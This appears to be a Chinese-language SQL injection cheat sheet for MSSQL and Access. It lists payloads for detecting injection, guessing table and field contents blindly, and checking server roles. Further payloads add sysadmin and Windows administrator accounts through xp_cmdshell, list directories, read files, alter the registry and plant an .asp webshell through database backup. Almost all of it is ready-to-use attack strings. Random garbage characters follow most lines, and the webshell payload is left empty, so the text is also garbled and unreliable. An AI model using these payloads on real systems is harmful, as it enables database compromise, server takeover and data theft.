1.判断是否有注入;and 1=1 ;and 1=2 i�Z�^t�Lnc
2.初步判断是否是mssql ;and user>0 ��-k4w�$0)
R�]LRgfi9
3.注入参数是字符'and [查询条件] and ''=' 5o�v F$qn�
WN��O|ziy
4.搜索时没过滤参数的'and [查询条件] and '%25'=' vS@�;D�7ep
�9A7LDHst7
5.判断数据库系统 *h <�_g�n�
eNQQ`�ll@m
;and (select count(*) from sysobjects)>0 mssql �~g#$'dS��
�Fj_6jsDb
;and (select count(*) from msysobjects)>0 access )U2cS\k'7n
K@RE-��K6{
%oee x1`�=
26e�.��Hu
6.猜数据库 ;and (select Count(*) from [数据库名])>0 J*!_kg)>�J
7I#<w[l>k�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 aa-{,X"MF
$�u ae8h��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 >e'Hz�(~'/
��5��.�I�X
9.(1)猜字段的ascii值(access) >��TK��l`O
tz6N,4�J?
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 B.Szp�_$�
l�?f%2�:}m
(2)猜字段的ascii值(mssql) zUQn*Cio e
iNlY\6�7sW
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �2#i���*'.
4��\#b@1]}
10.测试权限结构(mssql) EC:u��;2f!
p%ve1�>c
�VR��'�R�7
'5f6
M^}|2
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 7o�99�@K,�
N=vb�*3ECg
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 4�qYT�����
U8>M�`�e"D
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ?z[k.l�+6w
�s7�789pR�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- K6���z)&<
�h1_9Xp�~N
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- D#.N)@��\�
|/Y�wMBi�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- i�Xgy/>qgT
e`7�dRnx&0
;and 1=(select IS_MEMBER('db_owner'));-- crDm2oA�~t
J#/L}�h;qH
r�L�Kwu��Z
KAFx^J��Lo
11.添加mssql和系统的帐户 :TZ</3�Sw
�dlf nh�f
;exec master.dbo.sp_addlogin username;-- 1�7C"@1�n-
;exec master.dbo.sp_password null,username,password;-- ;_nV*G.y#^
�=�/Lw�prj
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- L>ruN�w'-K
#~JR_oQE�!
;exec master.dbo.xp_cmdshell 'net user username password �<@]��(uWu
\�F; �� �S
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 5�bZ�jW�~d
���&tjv.t�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 4b��@�Awtk
Qt~QJJN?oF
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- tK0�Ksnl�^
�'CfM'f3uu
`p��JWZ:3
�Py��!
F
12.(1)遍历目录 gm1 7��VrC
�N�
t-�8[J
;create table dirs(paths varchar(100), id int) !A|ayYBb\
��
%&81xAt
;insert dirs exec master.dbo.xp_dirtree 'c:\' �4�e!��>�A
�M3EB=�t�U
;and (select top 1 paths from dirs)>0 Z37�%�jd�r
!xR�b�oP�g
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) S [=l�/3c�
�9��x]yu6
a*�N<g�Id�
S�O#R5Mu2N
(2)遍历目录 R)�Y�*<�Na
:9.QhY)D�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- v�K7J;U+cJ
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �scZSn�CrR
|%tI!R�N):
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 bpaS(n�By�
�7,!$l�T#�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �x�3C^�S�~
�|EpL~�G�_
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��V�.?Oly�
RHj<t")��;
&f"kWOe$X
rP<S�
=eb�
13.mssql中的存储过程 Eo��@�b)�h
�CW �.
O"_
xp_regenumvalues 注册表根键, 子键 79y'PF�Sms
b�'mp�$lt!
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 uupfL��>�h
wQ�R0�R~|M
xp_regread 根键,子键,键值名 #*v:��.0�%
[7�+��dZL[
;exec xp_regread SQhw �|QdG
WvVf+|�K�m
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �Eq8�2?+9�
\*�r]v;NcP
xp_regwrite 根键,子键, 值名, 值类型, 值 Y5X�h�V;16
'"4S�3Fysm
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ^1jZwP;5eW
�i4g9�9Kvl
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �k4!z��;Yq
S�>���N/K�
xp_regdeletevalue 根键,子键,值名 y7LT�;��`A
f{j.jf�l\x
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 zjlo3=FQX[
.G/2CVM��j
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 T!3_Q/~^�r
`���ZLA=oD
;z3w#fN�Mv
tE�C`�->�|
14.mssql的backup创建webshell �Xt%>�X��P
e�nw7?|��(
use model 3w!,@=��.q
B�Sc�5@;�
create table cmd(str image); 8^��U��+P%
863PVce",}
insert into cmd(str) values (''); �=z�X�A0�%
I7@�g�,�~s
backup database model to disk='c:\l.asp'; k�M o7mk�V
meM61�ue_2
la�X67Vjv
�m@#@7[6]o
15.mssql内置函数 �|h{#r�7H0
9+"\7��MHw
;and (select @@version)>0 获得Windows的版本号 U|YI�u!��^
W�%&'EJ)62
;and user_name()='dbo' 判断当前系统的连接用户是不是sa zZ�}�)$Ny(
!-�<��P�V
;and (select user_name())>0 爆当前系统的连接用户 !^�*-]�p/z
WY`hNT�6M�
;and (select db_name())>0 得到当前连接的数据库 ��-'F��? |
$9In\�x��
cp�e/GvD5]
�%$�3)xtS6
16.简洁的webshell � `G�Q'yv�
Qf<@
:T*��
use model vb1Gz]�~)>
��[;*Vm0>t
create table cmd(str image); =j$!N#� L
�%Tvy|�L
,
insert into cmd(str) values (''); ��E�T:B"��
Q?7:�Xb��N
backup database model to disk='g:\wwwtest\l.asp';
